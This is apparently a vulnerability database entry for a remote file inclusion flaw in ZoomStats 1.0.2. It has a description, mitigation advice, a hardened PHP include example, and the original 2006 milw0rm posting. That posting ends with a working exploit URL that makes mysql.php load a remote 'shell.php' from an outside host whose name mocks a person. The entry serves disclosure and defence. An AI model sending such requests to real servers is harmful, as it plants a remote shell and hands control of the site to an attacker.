Vendor: ZoomStats
By: Drago84
CVSS: 7.5 (HIGH)
Type: Remote File Inclusion
CWE: 98
Product Name: ZoomStats
Affected Version From: 1.0.2
Affected Version To: 1.0.2
Patch Exists: N/A
Related CWE: N/A
CPE: a:zoomstats:zoomstats
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Published: 2006

ToXiC

A remote file inclusion vulnerability exists in ZoomStats because the $GLOBALS['lib']['db']['path'] array is never declared before it is used. An attacker can exploit this by sending a specially crafted HTTP request that supplies a malicious URL in the GLOBALS['lib']['db']['path'] parameter to the vulnerable page, mysql.php, located in the /libs/dbmax/ directory.

Mitigation:

Declare and initialize $GLOBALS['lib']['db']['path'] in the application itself rather than leaving it to be populated from request data, and ensure that any user input is properly validated before it is used in a file path.
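The following is an added example, not ZoomStats' own code, showing the include pattern this entry describes next to a hardened replacement. It assumes the original script built an include path from the undeclared $GLOBALS['lib']['db']['path'] and that the deployment let request parameters populate global variables (PHP's register_globals, which the entry does not name and which was removed in PHP 5.4); the function safe_include() and the file name mysql_common.php are hypothetical.

```php
<?php
// Added example (not ZoomStats' code). Shows the CWE-98 pattern behind
// this entry and a hardened form. Assumption: the original include was
// built from $GLOBALS['lib']['db']['path'], which nothing had declared.

// --- Vulnerable pattern (constructed illustration, kept as a comment) ----
// With register_globals enabled, a request parameter named
// GLOBALS[lib][db][path] fills the undeclared array, so an include such as
//
//   require_once $GLOBALS['lib']['db']['path'] . '/mysql_common.php';
//
// fetches whatever location the request supplied (a remote URL when
// allow_url_include is on).

// --- Hardened form ---------------------------------------------------------

// 1. Discard any inbound value and declare the path yourself. Clearing the
//    request copies defeats register_globals-style injection even on a
//    server where the setting cannot be changed.
unset($_GET['GLOBALS'], $_POST['GLOBALS'], $_COOKIE['GLOBALS'], $_REQUEST['GLOBALS']);
$GLOBALS['lib']['db']['path'] = __DIR__;   // fixed, code-controlled location

// 2. Confine every include built from a variable to a known directory.
//    (safe_include is a hypothetical helper, not part of ZoomStats.)
function safe_include(string $base, string $file): string
{
    // Accept only a bare PHP file name: no separators, no URL schemes.
    if (!preg_match('/^[A-Za-z0-9_]+\.php$/', $file)) {
        throw new InvalidArgumentException("rejected include name: $file");
    }
    $baseReal = realpath($base);
    $target   = realpath($base . DIRECTORY_SEPARATOR . $file);
    // realpath() returns false for missing files and strips any '..' tricks;
    // the prefix check rejects anything that resolved outside $base.
    if ($baseReal === false || $target === false
        || strncmp($target, $baseReal . DIRECTORY_SEPARATOR, strlen($baseReal) + 1) !== 0) {
        throw new RuntimeException("include outside base dir: $file");
    }
    return $target;
}

// Constructed usage: the included file name is a literal, never request data.
require_once safe_include($GLOBALS['lib']['db']['path'], 'mysql_common.php');
```

The server-side control that complements this is keeping allow_url_include (and, on PHP older than 5.4, register_globals) switched off in php.ini; both are system-level settings that a script cannot change at runtime, so the code above is written to be safe even where they are misconfigured.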
Source

Exploit-DB raw data:

###### ToXiC #########################
#
#BuG FounD  by Drago84
#
#Application Affect:ZoomStats
#Source Code:
#http://prdownloads.sourceforge.net/zoomstats/ZoomStats-v1.0.2.zip?use_mirror=kent
#Problem:
#$GLOBALS['lib']['db']['path'] array not declare
#Solution : $GLOBALS['lib']['db']['path']
#Page Vulnerable : mysql.php
#Dir Page: /libs/dbmax/
# Exempe Of ExPloit is:
#http://www.site.com/zoomstats/libs/dbmax/mysql.php?GLOBALS['lib']['db']['path']=http://marcusbestlamer.gay/shell.php?
#GrEatZ All Member of ToXiC, Str0ke
# ToXic Security
###### ToXiC ###Drago84###############

# milw0rm.com [2006-09-24]